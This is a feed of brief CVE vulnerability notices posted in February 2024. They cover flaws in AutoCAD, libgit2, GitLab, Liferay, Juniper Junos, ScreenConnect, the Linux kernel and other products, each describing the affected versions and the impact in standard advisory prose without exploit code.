🚨 CVE-2024-23135A maliciously crafted SLDPRT file when ASMkern228A.dll parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.🎖@cveNotify |
|
| 2024-02-22 05:37:24 |
🚨 CVE-2024-23134A maliciously crafted IGS file when tbb.dll parsed through Autodesk AutoCAD can be used in user-after-free vulnerability. This vulnerability, along with other vulnerabilities, could lead to code execution in the current process.🎖@cveNotify |
|
| 2024-02-22 04:37:32 |
🚨 CVE-2024-23129A maliciously crafted MODEL 3DM, STP or SLDASM files in opennurbs.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-02-22 04:37:26 |
🚨 CVE-2024-23128A maliciously crafted MODEL file in libodxdll.dll when parsed through Autodesk AutoCAD could lead to a memory corruption vulnerability by write access violation. This vulnerability in conjunction with other vulnerabilities could lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-02-22 04:37:25 |
🚨 CVE-2024-24577libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_index_add` can cause heap corruption that could be leveraged for arbitrary code execution. There is an issue in the `has_dir_name` function in `src/libgit2/index.c`, which frees an entry that should not be freed. The freed entry is later used and overwritten with potentially bad actor-controlled data leading to controlled heap corruption. Depending on the application that uses libgit2, this could lead to arbitrary code execution. This issue has been patched in version 1.6.5 and 1.7.2.🎖@cveNotify |
|
| 2024-02-22 04:37:24 |
🚨 CVE-2024-24575libgit2 is a portable C implementation of the Git core methods provided as a linkable library with a solid API, allowing to build Git functionality into your application. Using well-crafted inputs to `git_revparse_single` can cause the function to enter an infinite loop, potentially causing a Denial of Service attack in the calling application. The revparse function in `src/libgit2/revparse.c` uses a loop to parse the user-provided spec string. There is an edge-case during parsing that allows a bad actor to force the loop conditions to access arbitrary memory. Potentially, this could also leak memory if the extracted rev spec is reflected back to the attacker. As such, libgit2 versions before 1.4.0 are not affected. Users should upgrade to version 1.6.5 or 1.7.2.🎖@cveNotify |
|
| 2024-02-22 04:07:33 |
🚨 CVE-2023-6953The PDF Generator For Fluent Forms – The Contact Form Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the header, PDF body and footer content parameters in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The exploitation level depends on who is granted the right to create forms by an administrator. This level can be as low as contributor, but by default is admin.🎖@cveNotify |
|
| 2024-02-22 04:07:27 |
🚨 CVE-2024-24397Cross Site Scripting vulnerability in Stimulsoft GmbH Stimulsoft Dashboard.JS before v.2024.1.2 allows a remote attacker to execute arbitrary code via a crafted payload to the ReportName field.🎖@cveNotify |
|
| 2024-02-22 04:07:26 |
🚨 CVE-2023-49775Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer.This issue affects CSV Importer: from n/a through 0.3.8.🎖@cveNotify |
|
| 2024-02-22 04:07:25 |
🚨 CVE-2009-3720The updatePosition function in lib/xmltok_impl.c in libexpat in Expat 2.0.1, as used in Python, PyXML, w3c-libwww, and other software, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with crafted UTF-8 sequences that trigger a buffer over-read, a different vulnerability than CVE-2009-2625.🎖@cveNotify |
|
| 2024-02-22 03:37:32 |
🚨 CVE-2024-1151A vulnerability was reported in the Open vSwitch sub-component in the Linux Kernel. The flaw occurs when a recursive operation of code push recursively calls into the code block. The OVS module does not validate the stack depth, pushing too many frames and causing a stack overflow. As a result, this can lead to a crash or other related issues.🎖@cveNotify |
|
| 2024-02-22 03:37:26 |
🚨 CVE-2024-23775Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().🎖@cveNotify |
|
| 2024-02-22 03:37:25 |
🚨 CVE-2019-10226HTML Injection has been discovered in the v0.19.0 version of the Fat Free CRM product via an authenticated request to the /comments URI. NOTE: the vendor disputes the significance of this report because some HTML formatting (such as with an H1 element) is allowed, but there is a XSS protection mechanism.🎖@cveNotify |
|
| 2024-02-22 02:37:32 |
🚨 CVE-2024-23123A maliciously crafted CATPART file when parsed in CC5Dll.dll and ASMBASE228A.dll through Autodesk AutoCAD can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, write sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-02-22 02:37:31 |
🚨 CVE-2024-22076MyQ Print Server before 8.2 patch 43 allows remote authenticated administrators to execute arbitrary code via PHP scripts that are reached through the administrative interface.🎖@cveNotify |
|
| 2024-02-22 02:37:30 |
🚨 CVE-1999-0211Extra long export lists over 256 characters in some mount daemons allows NFS directories to be mounted by anyone.🎖@cveNotify |
|
| 2024-02-22 01:37:25 |
🚨 CVE-2024-25251code-projects Agro-School Management System 1.0 is suffers from Incorrect Access Control.🎖@cveNotify |
|
| 2024-02-22 01:37:24 |
🚨 CVE-2024-1485A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into parsing a devfile which uses the `parent` or `plugin` keywords. This could download a malicious archive and cause the cleanup process to overwrite or delete files outside of the archive, which should not be allowed.🎖@cveNotify |
|
| 2024-02-22 00:37:38 |
🚨 CVE-2024-1451An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.9 before 16.9.1. A crafted payload added to the user profile page could lead to a stored XSS on the client side, allowing attackers to perform arbitrary actions on behalf of victims."🎖@cveNotify |
|
| 2024-02-22 00:37:31 |
🚨 CVE-2023-6477An issue has been discovered in GitLab EE affecting all versions starting from 16.5 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. When a user is assigned a custom role with admin_group_member permission, they may be able to make a group, other members or themselves Owners of that group, which may lead to privilege escalation.🎖@cveNotify |
|
| 2024-02-22 00:37:30 |
🚨 CVE-2023-5841Due to a failure in validating the number of scanline samples of a OpenEXR file containing deep scanline data, Academy Software Foundation OpenEX image parsing library version 3.2.1 and prior is susceptible to a heap-based buffer overflow vulnerability. This issue was resolved as of versions v3.2.2 and v3.1.12 of the affected library.🎖@cveNotify |
|
| 2024-02-21 23:37:35 |
🚨 CVE-2024-26148Querybook is a user interface for querying big data. Prior to version 3.31.1, there is a vulnerability in Querybook's rich text editor that enables users to input arbitrary URLs without undergoing necessary validation. This particular security flaw allows the use of `javascript:` protocol which can potentially trigger arbitrary client-side execution. The most extreme exploit of this flaw could occur when an admin user unknowingly clicks on a cross-site scripting URL, thereby unintentionally compromising admin role access to the attacker. A patch to rectify this issue has been introduced in Querybook version `3.31.1`. The fix is backward compatible and automatically fixes existing DataDocs. There are no known workarounds for this issue, except for manually checking each URL prior to clicking on them.🎖@cveNotify |
|
| 2024-02-21 23:37:34 |
🚨 CVE-2023-44188A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in telemetry processing of Juniper Networks Junos OS allows a network-based authenticated attacker to flood the system with multiple telemetry requests, causing the Junos Kernel Debugging Streaming Daemon (jkdsd) process to crash, leading to a Denial of Service (DoS). Continued receipt and processing of telemetry requests will repeatedly crash the jkdsd process and sustain the Denial of Service (DoS) condition.This issue is seen on all Junos platforms. The crash is triggered when multiple telemetry requests come from different collectors. As the load increases, the Dynamic Rendering Daemon (drend) decides to defer processing and continue later, which results in a timing issue accessing stale memory, causing the jkdsd process to crash and restart.Note: jkdsd is not shipped with SRX Series devices and therefore are not affected by this vulnerability.This issue affects:Juniper Networks Junos OS: * 20.4 versions prior to 20.4R3-S9; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S6; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S1, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S2, 22.4R3; * 23.1 versions prior to 23.1R2.This issue does not affect Juniper Networks Junos OS versions prior to 19.4R1.🎖@cveNotify |
|
| 2024-02-21 22:37:25 |
🚨 CVE-2023-52153A SQL Injection vulnerability in /pmb/opac_css/includes/sessions.inc.php in PMB 7.4.7 and earlier allows remote unauthenticated attackers to inject arbitrary SQL commands via the PmbOpac-LOGIN cookie value.🎖@cveNotify |
|
| 2024-02-21 22:37:24 |
🚨 CVE-2023-51828A SQL Injection vulnerability in /admin/convert/export.class.php in PMB 7.4.7 and earlier versions allows remote unauthenticated attackers to execute arbitrary SQL commands via the query parameter in get_next_notice function.🎖@cveNotify |
|
| 2024-02-21 21:37:32 |
🚨 CVE-2023-24330Command Injection vulnerability in D-Link Dir 882 with firmware version DIR882A1_FW130B06 allows attackers to run arbitrary commands via crafted POST request to /HNAP1/.🎖@cveNotify |
|
| 2024-02-21 21:37:26 |
🚨 CVE-2024-0822An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command.🎖@cveNotify |
|
| 2024-02-21 21:37:25 |
🚨 CVE-2020-25644A memory leak flaw was found in WildFly OpenSSL in versions prior to 1.1.3.Final, where it removes an HTTP session. It may allow the attacker to cause OOM leading to a denial of service. The highest threat from this vulnerability is to system availability.🎖@cveNotify |
|
| 2024-02-21 21:37:24 |
🚨 CVE-2010-3322The XML parser in Splunk 4.0.0 through 4.1.4 allows remote authenticated users to obtain sensitive information and gain privileges via an XML External Entity (XXE) attack to unknown vectors.🎖@cveNotify |
|
| 2024-02-21 21:07:34 |
🚨 CVE-2021-21272ORAS is open source software which enables a way to push OCI Artifacts to OCI Conformant registries. ORAS is both a CLI for initial testing and a Go Module. In ORAS from version 0.4.0 and before version 0.9.0, there is a "zip-slip" vulnerability. The directory support feature allows the downloaded gzipped tarballs to be automatically extracted to the user-specified directory where the tarball can have symbolic links and hard links. A well-crafted tarball or tarballs allow malicious artifact providers linking, writing, or overwriting specific files on the host filesystem outside of the user-specified directory unexpectedly with the same permissions as the user who runs `oras pull`. Users of the affected versions are impacted if they are `oras` CLI users who runs `oras pull`, or if they are Go programs, which invoke `github.com/deislabs/oras/pkg/content.FileStore`. The problem has been fixed in version 0.9.0. For `oras` CLI users, there is no workarounds other than pulling from a trusted artifact provider. For `oras` package users, the workaround is to not use `github.com/deislabs/oras/pkg/content.FileStore`, and use other content stores instead, or pull from a trusted artifact provider.🎖@cveNotify |
|
| 2024-02-21 21:07:33 |
🚨 CVE-2002-0725NTFS file system in Windows NT 4.0 and Windows 2000 SP2 allows local attackers to hide file usage activities via a hard link to the target file, which causes the link to be recorded in the audit trail instead of the target file.🎖@cveNotify |
|
| 2024-02-21 20:37:31 |
🚨 CVE-2024-26311Archer Platform 6.x before 6.14 P2 HF1 (6.14.0.2.1) contains a reflected XSS vulnerability. A remote authenticated malicious Archer user could potentially exploit this by tricking a victim application user into supplying malicious JavaScript code to the vulnerable web application. This code is then reflected to the victim and gets executed by the web browser in the context of the vulnerable web application.🎖@cveNotify |
|
| 2024-02-21 20:37:30 |
🚨 CVE-2024-26310Archer Platform 6.8 before 6.14 P2 (6.14.0.2) contains an improper access control vulnerability. A remote authenticated malicious user could potentially exploit this to gain access to API information that should only be accessible with extra privileges.🎖@cveNotify |
|
| 2024-02-21 20:37:26 |
🚨 CVE-2024-25249An issue in He3 App for macOS version 2.0.17, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-02-21 20:37:25 |
🚨 CVE-2023-22392A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS).PTX3000, PTX5000, QFX10000, PTX1000, PTX10002, and PTX10004, PTX10008 and PTX10016 with LC110x FPCs do not support certain flow-routes. Once a flow-route is received over an established BGP session and an attempt is made to install the resulting filter into the PFE, FPC heap memory is leaked. The FPC heap memory can be monitored using the CLI command "show chassis fpc".The following syslog messages can be observed if the respective filter derived from a flow-route cannot be installed.expr_dfw_sfm_range_add:661 SFM packet-length Unable to get a sfm entry for updating the hwexpr_dfw_hw_sfm_add:750 Unable to add the filter secondarymatch to the hardwareexpr_dfw_base_hw_add:52 Failed to add h/w sfm data.expr_dfw_base_hw_create:114 Failed to add h/w data.expr_dfw_base_pfe_inst_create:241 Failed to create base inst for sfilter 0 on PFE 0 for __flowspec_default_inet__expr_dfw_flt_inst_change:1368 Failed to create __flowspec_default_inet__ on PFE 0expr_dfw_hw_pgm_fnum:465 dfw_pfe_inst_old not found for pfe_index 0!expr_dfw_bp_pgm_flt_num:548 Failed to pgm bind-point in hw: generic failureexpr_dfw_bp_topo_handler:1102 Failed to program fnum.expr_dfw_entry_process_change:679 Failed to change instance for filter __flowspec_default_inet__.This issue affects Juniper Networks Junos OS:on PTX1000, PTX10002, and PTX10004, PTX10008 and PTX10016 with LC110x FPCs: * All versions prior to 20.4R3-S5; * 21.1 versions prior to 21.1R3-S4; * 21.2 versions prior to 21.2R3-S2; * 21.3 versions prior to 21.3R3; * 21.4 versions prior to 21.4R2-S2, 21.4R3; * 22.1 versions prior to 22.1R1-S2, 22.1R2.on PTX3000, PTX5000, QFX10000: * All versions prior to 20.4R3-S8; * 21.1 version 21.1R1 and later versions; * 21.2 versions prior to 21.2R3-S6; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S4; * 22.1 versions prior to 22.1R3-S3 * 22.2 versions prior to 22.2R3-S1 * 22.3 versions prior to 22.3R2-S2, 22.3R3 * 22.4 versions prior to 22.4R2.🎖@cveNotify |
|
| 2024-02-21 19:37:32 |
🚨 CVE-2024-24476Buffer Overflow vulnerability in Wireshark team Wireshark before v.4.2.0 allows a remote attacker to cause a denial of service via the pan/addr_resolv.c, and ws_manuf_lookup_str(), size components.🎖@cveNotify |
|
| 2024-02-21 19:37:25 |
🚨 CVE-2024-1709ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.🎖@cveNotify |
|
| 2024-02-21 19:37:24 |
🚨 CVE-2024-1708ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulnerability, which may allow an attacker the ability to execute remote code or directly impact confidential data or critical systems.🎖@cveNotify |
|
| 2024-02-21 17:37:32 |
🚨 CVE-2024-20325A vulnerability in the Live Data server of Cisco Unified Intelligence Center could allow an unauthenticated, local attacker to read and modify data in a repository that belongs to an internal service on an affected device. This vulnerability is due to insufficient access control implementations on cluster configuration CLI requests. An attacker could exploit this vulnerability by sending a cluster configuration CLI request to specific directories on an affected device. A successful exploit could allow the attacker to read and modify data that is handled by an internal service on the affected device.🎖@cveNotify |
|
| 2024-02-21 17:37:26 |
🚨 CVE-2024-1714An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an entitlement with a value containing leading or trailing whitespace is requested by an authenticated user in an access request.🎖@cveNotify |
|
| 2024-02-21 17:37:25 |
🚨 CVE-2024-27215ConnectWise ScreenConnnect before 23.9.8 allows authentication bypass via an alternate path or channel.🎖@cveNotify |
|
| 2024-02-21 17:37:24 |
🚨 CVE-2024-1485A flaw was found in the decompression function of registry-support. This issue can be triggered if an unauthenticated remote attacker tricks a user into parsing a devfile which uses the `parent` or `plugin` keywords. This could download a malicious archive and cause the cleanup process to overwrite or delete files outside of the archive, which should not be allowed.🎖@cveNotify |
|
| 2024-02-21 16:38:14 |
🚨 CVE-2024-1474In WS_FTP Server versions before 8.8.5, reflected cross-site scripting issues have been identified on various user supplied inputs on the WS_FTP Server administrative interface.🎖@cveNotify |
|
| 2024-02-21 16:38:11 |
🚨 CVE-2023-49100Trusted Firmware-A (TF-A) before 2.10 has a potential read out-of-bounds in the SDEI service. The input parameter passed in register x1 is not validated well enough in the function sdei_interrupt_bind. The parameter is passed to a call to plat_ic_get_interrupt_type. It can be any arbitrary value passing checks in the function plat_ic_is_sgi. A compromised Normal World (Linux kernel) can enable a root-privileged attacker to issue arbitrary SMC calls. Using this primitive, he can control the content of registers x0 through x6, which are used to send parameters to TF-A. Out-of-bounds addresses can be read in the context of TF-A (EL3). Because the read value is never returned to non-secure memory or in registers, no leak is possible. An attacker can still crash TF-A, however.🎖@cveNotify |
|
| 2024-02-21 16:38:10 |
🚨 CVE-2022-45177An issue was discovered in LIVEBOX Collaboration vDesk through v031. An Observable Response Discrepancy can occur under the /api/v1/vdeskintegration/user/isenableuser endpoint, the /api/v1/sharedsearch?search={NAME]+{SURNAME] endpoint, and the /login endpoint. The web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor outside of the intended control sphere.🎖@cveNotify |
|
| 2024-02-21 16:38:09 |
🚨 CVE-2022-45169An issue was discovered in LIVEBOX Collaboration vDesk through v031. A URL Redirection to an Untrusted Site (Open Redirect) can occur under the /api/v1/notification/createnotification endpoint, allowing an authenticated user to send an arbitrary push notification to any other user of the system. This push notification can include an (invisible) clickable link.🎖@cveNotify |
|
| 2024-02-21 15:37:57 |
🚨 CVE-2023-50955IBM InfoSphere Information Server 11.7 could allow an authenticated privileged user to obtain the absolute path of the web server installation which could aid in further attacks against the system. IBM X-Force ID: 275777.🎖@cveNotify |
|
| 2024-02-21 15:37:56 |
🚨 CVE-2023-6259Insufficiently Protected Credentials, : Improper Access Control vulnerability in Brivo ACS100, ACS300 allows Password Recovery Exploitation, Bypassing Physical Security.This issue affects ACS100, ACS300: from 5.2.4 before 6.2.4.3.🎖@cveNotify |
|
| 2024-02-21 14:38:24 |
🚨 CVE-2023-47795Stored cross-site scripting (XSS) vulnerability in the Document and Media widget in Liferay Portal 7.4.3.18 through 7.4.3.101, and Liferay DXP 2023.Q3 before patch 6, and 7.4 update 18 through 92 allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into a document's “Title” text field.🎖@cveNotify |
|
| 2024-02-21 14:38:23 |
🚨 CVE-2024-21341Windows Kernel Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-02-21 13:37:25 |
🚨 CVE-2023-50387Certain DNSSEC aspects of the DNS protocol (in RFC 4033, 4034, 4035, 6840, and related RFCs) allow remote attackers to cause a denial of service (CPU consumption) via one or more DNSSEC responses, aka the "KeyTrap" issue. One of the concerns is that, when there is a zone with many DNSKEY and RRSIG records, the protocol specification implies that an algorithm must evaluate all combinations of DNSKEY and RRSIG records.🎖@cveNotify |
|
| 2024-02-21 11:37:25 |
🚨 CVE-2023-7235The OpenVPN GUI installer before version 2.6.9 did not set the proper access control restrictions to the installation directory of OpenVPN binaries when using a non-standard installation path, which allows an attacker to replace binaries to run arbitrary executables.🎖@cveNotify |
|
| 2024-02-21 10:38:01 |
🚨 CVE-2023-6398A post-authentication command injection vulnerability in the file upload binary in Zyxel ATP series firmware versions from 4.32 through 5.37 Patch 1, USG FLEX series firmware versions from 4.50 through 5.37 Patch 1, USG FLEX 50(W) series firmware versions from 4.16 through 5.37 Patch 1, USG20(W)-VPN series firmware versions from 4.16 through 5.37 Patch 1, USG FLEX H series firmware versions from 1.10 through 1.10 Patch 1,NWA50AX firmware versions through 6.29(ABYW.3), WAC500 firmware versions through 6.65(ABVS.1), WAX300H firmware versions through 6.60(ACHF.1), and WBE660S firmware versions through 6.65(ACGG.1) could allow an authenticated attacker with administrator privileges to execute some operating system (OS) commands on an affected device via FTP.🎖@cveNotify |
|
| 2024-02-21 08:38:01 |
🚨 CVE-2024-24837Cross-Site Request Forgery (CSRF) vulnerability in Frédéric GILLES FG PrestaShop to WooCommerce, Frédéric GILLES FG Drupal to WordPress, Frédéric GILLES FG Joomla to WordPress.This issue affects FG PrestaShop to WooCommerce: from n/a through 4.44.3; FG Drupal to WordPress: from n/a through 3.67.0; FG Joomla to WordPress: from n/a through 4.15.0.🎖@cveNotify |
|
| 2024-02-21 08:37:56 |
🚨 CVE-2024-24798Cross-Site Request Forgery (CSRF) vulnerability in SoniNow Team Debug.This issue affects Debug: from n/a through 1.10.🎖@cveNotify |
|
| 2024-02-21 08:37:55 |
🚨 CVE-2023-52440In the Linux kernel, the following vulnerability has been resolved:ksmbd: fix slub overflow in ksmbd_decode_ntlmssp_auth_blob()If authblob->SessionKey.Length is bigger than session keysize(CIFS_KEY_SIZE), slub overflow can happen in key exchange codes.cifs_arc4_crypt copy to session key array from SessionKey from client.🎖@cveNotify |
|
| 2024-02-21 07:37:32 |
🚨 CVE-2023-42834A privacy issue was addressed with improved handling of files. This issue is fixed in watchOS 10.1, macOS Sonoma 14.1, macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.1 and iPadOS 17.1. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-02-21 07:37:26 |
🚨 CVE-2023-42823The issue was resolved by sanitizing logging This issue is fixed in watchOS 10.1, macOS Sonoma 14.1, tvOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1, macOS Ventura 13.6.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-02-21 07:37:25 |
🚨 CVE-2023-46045Graphviz 2.36 before 10.0.0 has an out-of-bounds read via a crafted config6a file. NOTE: exploitability may be uncommon because this file is typically owned by root.🎖@cveNotify |
|
| 2024-02-21 07:37:24 |
🚨 CVE-2024-23222A type confusion issue was addressed with improved checks. This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS Ventura 13.6.4, macOS Monterey 12.7.3, visionOS 1.0.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-02-21 05:37:25 |
🚨 CVE-2024-1631Impact: The library offers a function to generate an ed25519 key pair via Ed25519KeyIdentity.generate with an optional param to provide a 32 byte seed value, which will then be used as the secret key. When no seed value is provided, it is expected that the library generates the secret key using secure randomness. However, a recent change broke this guarantee and uses an insecure seed for key pair generation. Since the private key of this identity (535yc-uxytb-gfk7h-tny7p-vjkoe-i4krp-3qmcl-uqfgr-cpgej-yqtjq-rqe) is compromised, one could lose funds associated with the principal on ledgers or lose access to a canister where this principal is the controller.🎖@cveNotify |
|
| 2024-02-21 04:37:43 |
🚨 CVE-2024-25151The Calendar module in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions does not escape user supplied data in the default notification email template, which allows remote authenticated users to inject arbitrary web script or HTML via the title of a calendar event or the user's name. This may lead to a content spoofing or cross-site scripting (XSS) attacks depending on the capability of the receiver's mail client.🎖@cveNotify |
|
| 2024-02-21 04:37:42 |
🚨 CVE-2024-1676Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to spoof security UI via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-02-21 04:37:38 |
🚨 CVE-2024-1674Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-02-21 04:37:37 |
🚨 CVE-2024-1671Inappropriate implementation in Site Isolation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-02-21 04:37:32 |
🚨 CVE-2024-1562The WooCommerce Google Sheet Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the execute_post_data function in all versions up to, and including, 1.3.11. This makes it possible for unauthenticated attackers to update plugin settings.🎖@cveNotify |
|
| 2024-02-21 04:37:31 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-21 03:37:48 |
🚨 CVE-2023-42496Reflected cross-site scripting (XSS) vulnerability on the add assignees to a role page in Liferay Portal 7.3.3 through 7.4.3.97, and Liferay DXP 2023.Q3 before patch 6, 7.4 GA through update 92, and 7.3 before update 34 allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_roles_admin_web_portlet_RolesAdminPortlet_tabs2 parameter.🎖@cveNotify |
|
| 2024-02-21 03:37:43 |
🚨 CVE-2024-24259freeglut through 3.4.0 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.🎖@cveNotify |
|
| 2024-02-21 03:37:42 |
🚨 CVE-2023-49295quic-go is an implementation of the QUIC protocol (RFC 9000, RFC 9001, RFC 9002) in Go. An attacker can cause its peer to run out of memory sending a large number of PATH_CHALLENGE frames. The receiver is supposed to respond to each PATH_CHALLENGE frame with a PATH_RESPONSE frame. The attacker can prevent the receiver from sending out (the vast majority of) these PATH_RESPONSE frames by collapsing the peers congestion window (by selectively acknowledging received packets) and by manipulating the peer's RTT estimate. This vulnerability has been patched in versions 0.37.7, 0.38.2 and 0.39.4.🎖@cveNotify |
|
| 2024-02-21 02:37:30 |
🚨 CVE-2024-25601Stored cross-site scripting (XSS) vulnerability in Expando module's geolocation custom fields in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the name text field of a geolocation custom field.🎖@cveNotify |
|
| 2024-02-21 02:37:29 |
🚨 CVE-2024-25147Cross-site scripting (XSS) vulnerability in HtmlUtil.escapeJsLink in Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via crafted javascript: style links.🎖@cveNotify |
|
| 2024-02-21 00:37:28 |
🚨 CVE-2023-50923In QUIC in RFC 9000, the Latency Spin Bit specification (section 17.4) does not strictly constrain the bit value when the feature is disabled, which might allow remote attackers to construct a covert channel with data represented as changes to the bit value. NOTE: The "Sheridan, S., Keane, A. (2015). In Proceedings of the 14th European Conference on Cyber Warfare and Security (ECCWS), University of Hertfordshire, Hatfield, UK." paper says "Modern Internet communication protocols provide an almost infinite number of ways in which data can be hidden or embed whithin seemingly normal network traffic."🎖@cveNotify |
|
| 2024-02-20 23:37:24 |
🚨 CVE-2024-23758An issue discovered in Unisys Stealth 5.3.062.0 allows attackers to view sensitive information via the Enterprise ManagementInstaller_msi.log file.🎖@cveNotify |
|
| 2024-02-20 22:37:32 |
🚨 CVE-2023-6936In wolfSSL prior to 5.6.6, if callback functions are enabled (via the WOLFSSL_CALLBACKS flag), then a malicious TLS client or network attacker can trigger a buffer over-read on the heap of 5 bytes (WOLFSSL_CALLBACKS is only intended for debugging).🎖@cveNotify |
|
| 2024-02-20 22:37:25 |
🚨 CVE-2024-25141When ssl was enabled for Mongo Hook, default settings included "allow_insecure" which caused that certificates were not validated. This was unexpected and undocumented.Users are recommended to upgrade to version 4.0.0, which fixes this issue.🎖@cveNotify |
|
| 2024-02-20 22:37:24 |
🚨 CVE-2024-23591ThinkSystem SR670V2 servers manufactured from approximately June 2021 to July 2023 were left in Manufacturing Mode which could allow an attacker with privileged logical access to the host or physical access to server internals to modify or disable Intel Boot Guard firmware integrity, SPS security, and other SPS configuration setting. The server’s NIST SP800-193-compliant Platform Firmware Resiliency (PFR) security subsystemsignificantly mitigates this issue.🎖@cveNotify |
|
| 2024-02-20 21:37:32 |
🚨 CVE-2023-52439In the Linux kernel, the following vulnerability has been resolved:uio: Fix use-after-free in uio_opencore-1 core-2-------------------------------------------------------uio_unregister_device uio_open idev = idr_find()device_unregister(&idev->dev)put_device(&idev->dev)uio_device_release get_device(&idev->dev)kfree(idev)uio_free_minor(minor) uio_release put_device(&idev->dev) kfree(idev)-------------------------------------------------------In the core-1 uio_unregister_device(), the device_unregister will kfreeidev when the idev->dev kobject ref is 1. But after core-1device_unregister, put_device and before doing kfree, the core-2 mayget_device. Then:1. After core-1 kfree idev, the core-2 will do use-after-free for idev.2. When core-2 do uio_release and put_device, the idev will be double freed.To address this issue, we can get idev atomic & inc idev reference withminor_lock.🎖@cveNotify |
|
| 2024-02-20 21:37:31 |
🚨 CVE-2023-52436In the Linux kernel, the following vulnerability has been resolved:f2fs: explicitly null-terminate the xattr listWhen setting an xattr, explicitly null-terminate the xattr list. Thiseliminates the fragile assumption that the unused xattr space is alwayszeroed.🎖@cveNotify |
|
| 2024-02-20 21:37:26 |
🚨 CVE-2024-21340Windows Kernel Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-02-20 21:37:25 |
🚨 CVE-2023-45572Buffer Overflow vulnerability in D-Link device DI-7003GV2.D1 v.23.08.25D1 and before, DI-7100G+V2.D1 v.23.08.23D1 and before, DI-7100GV2.D1 v.23.08.23D1, DI-7200G+V2.D1 v.23.08.23D1 and before, DI-7200GV2.E1 v.23.08.23E1 and before, DI-7300G+V2.D1 v.23.08.23D1, and DI-7400G+V2.D1 v.23.08.23D1 and before allows a remote attacker to execute arbitrary code via the fn parameter of the tgfile.htm function.🎖@cveNotify |
|
| 2024-02-20 21:07:31 |
🚨 CVE-2024-23478SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Remote Code Execution Vulnerability. If exploited, this vulnerability allows an authenticated user to abuse a SolarWinds service, resulting in remote code execution.🎖@cveNotify |
|
| 2024-02-20 21:07:26 |
